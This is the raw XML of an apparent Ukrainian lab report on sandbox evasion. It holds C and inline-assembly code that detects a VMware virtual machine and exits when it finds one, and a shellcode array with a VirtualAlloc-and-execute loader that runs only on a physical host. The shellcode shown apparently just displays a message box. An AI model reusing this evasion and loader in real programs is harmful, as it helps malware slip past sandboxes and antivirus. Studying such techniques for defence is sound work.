      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>зу</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>при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запуску</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cuckoo </w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>та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лаборатор</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ї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з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поперднього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пункту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програма</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: – </w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>не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має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ознак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шк</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>дливост</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cuckoo </w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>та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не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детектується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антив</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>русами</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, – </w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>завершує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роботу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в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середовищ</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>анал</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>зу</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, – </w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>при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запуску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у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ф</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>зичн</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>й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систем</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>показує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пов</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>домлення</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>користувачу</w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MessageBox “Hello kitty!”).</w:t>
      </w:r>
      <w:r w:rsidR="00065C1B" w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EBEC64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728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6D87EB0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728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0A80EEEC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A8411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IsVirtualMachine(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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E8939B9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isVM =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7834DE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__try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B90E723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__asm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100164A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push   edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B63CFED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push   ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2C9608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push   ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C849010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97A9E1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eax, </w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'VMXh'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495CDE27" w14:textId="4C7CD650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ebx, 0 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC3479A" w14:textId="6C369A72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ecx, 10 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009E92BA" w14:textId="05CFEA06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edx, </w:t>
      </w:r>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'VX'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6F8A63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FC3FD" w14:textId="14519D28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     eax, dx </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6E76A3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A07C1" w14:textId="1A06CB1F" w:rsidR="0024728F" w:rsidRPr="00FA533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cmp    ebx, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA533F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>'VMXh'</w:t>
      </w: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</w:p>
    <w:p w14:paraId="07986E54" w14:textId="11AB1199" w:rsidR="0024728F" w:rsidRPr="00FA533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   setz[isVM] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCD3F9D" w14:textId="77777777" w:rsidR="0024728F" w:rsidRPr="00FA533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460E6598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   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pop    ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315C3FED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pop    ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0D3A6B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pop    edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0586F41D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4FBCD3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84123F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CD840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isVM;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC0CF2B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D855C7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F6CC3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DC5AE4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IsVirtualMachine(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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E91F568" w14:textId="617402AA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8099D5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9A4E62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472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ABDBC73" w14:textId="77777777" w:rsidR="0024728F" w:rsidRP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4728F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4728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4728F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4728F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Hello kitty!"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4728F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4728F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4728F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MB_OK</w:t>
      </w:r>
      <w:r w:rsidRPr="002472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BB3EA9" w14:textId="77777777" w:rsid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5F921D" w14:textId="77777777" w:rsid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1754FA2" w14:textId="77777777" w:rsidR="0024728F" w:rsidRDefault="0024728F" w:rsidP="00247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80BCA0" w14:textId="77777777" w:rsidR="0024728F" w:rsidRPr="0024728F" w:rsidRDefault="0024728F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F830437" w14:textId="00457C8A" w:rsidR="00065C1B" w:rsidRDefault="00065C1B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD80818" w14:textId="77777777" w:rsidR="00717B65" w:rsidRDefault="00717B65">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30CDD488" wp14:editId="5B58C597">
            <wp:extent cx="4579620" cy="230327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215" cy="23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6359" w14:textId="6FD4413F" w:rsidR="00065C1B" w:rsidRPr="00065C1B" w:rsidRDefault="00065C1B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065C1B">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AD65BD7" wp14:editId="1BCD740E">
            <wp:extent cx="5940425" cy="24199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2338" w14:textId="3D24D56A" w:rsidR="0024728F" w:rsidRDefault="0024728F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51252DA4" w14:textId="1470FA48" w:rsidR="00FE1F4C" w:rsidRDefault="00FE1F4C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE1F4C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Замiнiть повiдомлення на запуск довiльного шеллкоду</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9AC053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ED10A84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248D460B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4D089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IsVirtualMachine(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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B810EFB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isVM =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88CA6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__try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BA8917F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__asm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CE2A323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push   edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D991BB3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push   ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C8A5C1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push   ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8B9D2E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19ACCE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eax,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'VMXh'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44070C10" w14:textId="7BCD7AD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ebx, 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D66A89D" w14:textId="1BFDE450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ecx, 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465F70F7" w14:textId="28A8687B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   edx,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'VX'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567D9D14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F0F1" w14:textId="5FBD10AC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     eax, dx </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F45E96C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18C646" w14:textId="73357617" w:rsidR="00FE1F4C" w:rsidRPr="00FA533F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cmp    ebx, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA533F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>'VMXh'</w:t>
      </w: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</w:p>
    <w:p w14:paraId="797B56CC" w14:textId="650047DD" w:rsidR="00FE1F4C" w:rsidRPr="00FA533F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   setz[isVM] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBDDB7B" w14:textId="77777777" w:rsidR="00FE1F4C" w:rsidRPr="00FA533F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0D99AB78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         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pop    ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B53CD65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pop    ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FB7B60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pop    edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B8E9FE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58021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7413713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__except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1F4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXCEPTION_EXECUTE_HANDLER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BEA9984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210069D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A8E92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isVM;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9C7991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F07356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8584E8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B4889E1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IsVirtualMachine(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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68DE4F28" w14:textId="56D1DEB2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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338FAA3E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82D7E7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BA1886B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shellcode[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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1EFB3FFF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"\x31\xc9\xf7\xe1\x64\x8b\x41\x30\x8b\x40"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D2EC49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"\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BF6D68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"\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D5142A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"\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14733985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"\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237267E1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"\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7707DDEE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"\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D9E056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"\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587FF3DF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"\x01\xde\x8b\x14\x8e\x01\xda\x89\xd5\x31"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBB876E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"\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18476380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"\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C0E57E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"\xd2\x68\x6c\x6c\x61\x61\x66\x81\x6c\x24"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5430CAE5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"\x02\x61\x61\x68\x33\x32\x2e\x64\x68\x55"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE48EE7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"\x73\x65\x72\x54\xff\xd0\x68\x6f\x78\x41"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514B1A58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"\x61\x66\x83\x6c\x24\x03\x61\x68\x61\x67"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493E877F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"\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE0F1B1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"\xd5\x83\xc4\x10\x31\xd2\x31\xc9\x52\x68"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A51C59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"\x50\x77\x6e\x64\x89\xe7\x52\x68\x59\x65"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573D3E59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"\x73\x73\x89\xe1\x52\x57\x51\x52\xff\xd0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638DC920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de-DE"/>
        </w:rPr>
        <w:t>"\x83\xc4\x10\x68\x65\x73\x73\x61\x66\x83"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5169C6F0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"\x6c\x24\x03\x61\x68\x50\x72\x6f\x63\x68"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6201B7C2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"\x45\x78\x69\x74\x54\x53\xff\xd5\x31\xc9"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F36DC2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F4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"\x51\xff\xd0"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C694F9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4E0B12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B79B1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* exec = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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VirtualAlloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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(shellcode), </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE1F4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MEM_COMMIT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E1F4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PAGE_EXECUTE_READWRITE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8786F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memcpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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exec, shellcode, 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(shellcode));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4740FAD6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((</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE1F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*)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE1F4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>))exec)();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E3CCA5" w14:textId="77777777" w:rsidR="00FE1F4C" w:rsidRPr="00FE1F4C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F8BE3" w14:textId="77777777" w:rsidR="00FE1F4C" w:rsidRPr="00FA533F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765044" w14:textId="77777777" w:rsidR="00FE1F4C" w:rsidRPr="00FA533F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53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6F22182" w14:textId="77777777" w:rsidR="00FE1F4C" w:rsidRPr="00FA533F" w:rsidRDefault="00FE1F4C" w:rsidP="00FE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3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E26D54" w14:textId="61979DB1" w:rsidR="00FE1F4C" w:rsidRPr="00FA533F" w:rsidRDefault="00FE1F4C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1089834B" w14:textId="74C5BFF7" w:rsidR="00FA533F" w:rsidRPr="003D3B97" w:rsidRDefault="00FA533F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">на віртуальній машині програма завершує роботу, на хості виводиться </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>messagebox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50864090" w14:textId="4AC45DE8" w:rsidR="00FA533F" w:rsidRPr="00FA533F" w:rsidRDefault="00FA533F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA533F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A537BCC" wp14:editId="1FC13E3E">
            <wp:extent cx="1600423" cy="1657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466" w14:textId="385038FE" w:rsidR="003540D0" w:rsidRDefault="003540D0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003540D0">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D91D4A9" wp14:editId="17501F9B">
            <wp:extent cx="5940425" cy="2573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2DA7" w14:textId="3B2D4A5E" w:rsidR="00717B65" w:rsidRDefault="00717B65">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024728F">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="535BB187" wp14:editId="7FB66C98">
            <wp:extent cx="4579620" cy="230327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215" cy="23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DA14" w14:textId="02748775" w:rsidR="003D3B97" w:rsidRDefault="003D3B97">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B7D50DF" w14:textId="77777777" w:rsidR="003D3B97" w:rsidRDefault="003D3B97">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D52E1B7" w14:textId="36458A46" w:rsidR="003D3B97" w:rsidRDefault="003D3B97">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22B7416E" w14:textId="4B5DB905" w:rsidR="003D3B97" w:rsidRDefault="00C03371">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03371">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="567588DB" wp14:editId="53324A6A">
            <wp:extent cx="5940425" cy="2667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DFF6" w14:textId="7CD351C9" w:rsidR="00C03371" w:rsidRDefault="00C03371">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03371">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13E83336" wp14:editId="38A3BE96">
            <wp:extent cx="5940425" cy="3038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8F4B" w14:textId="7A3351DA" w:rsidR="00C03371" w:rsidRPr="00AB1C5C" w:rsidRDefault="00C03371">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40837BB6" w14:textId="77777777" w:rsidR="003D3B97" w:rsidRDefault="003D3B97">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003D3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143"/>
    <w:rsid w:val="00065C1B"/>
    <w:rsid w:val="00071B43"/>
    <w:rsid w:val="00140F0D"/>
    <w:rsid w:val="00194F5C"/>
    <w:rsid w:val="001C7CD7"/>
    <w:rsid w:val="001F37FD"/>
    <w:rsid w:val="0024728F"/>
    <w:rsid w:val="002D02A3"/>
    <w:rsid w:val="002D473C"/>
    <w:rsid w:val="00306924"/>
    <w:rsid w:val="003540D0"/>
    <w:rsid w:val="003D3B97"/>
    <w:rsid w:val="004C23AB"/>
    <w:rsid w:val="004D05CD"/>
    <w:rsid w:val="0051298D"/>
    <w:rsid w:val="00563143"/>
    <w:rsid w:val="00611749"/>
    <w:rsid w:val="006C7B6C"/>
    <w:rsid w:val="006D2103"/>
    <w:rsid w:val="00717B65"/>
    <w:rsid w:val="00795F5C"/>
    <w:rsid w:val="008C08F8"/>
    <w:rsid w:val="008E543C"/>
    <w:rsid w:val="00920872"/>
    <w:rsid w:val="009636EA"/>
    <w:rsid w:val="009A3601"/>
    <w:rsid w:val="00A508E9"/>
    <w:rsid w:val="00AB1C5C"/>
    <w:rsid w:val="00C03371"/>
    <w:rsid w:val="00C34AF2"/>
    <w:rsid w:val="00CA56AC"/>
    <w:rsid w:val="00CD7FBA"/>
    <w:rsid w:val="00D440F1"/>
    <w:rsid w:val="00D65076"/>
    <w:rsid w:val="00DB70D8"/>
    <w:rsid w:val="00EB11B5"/>
    <w:rsid w:val="00F20DF2"/>
    <w:rsid w:val="00F21F95"/>
    <w:rsid w:val="00FA533F"/>
    <w:rsid w:val="00FE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4EC4B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{010D328F-4454-49B2-BAE9-976263038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69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4F5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94F5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94F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10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15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-10T17:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-29T15:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>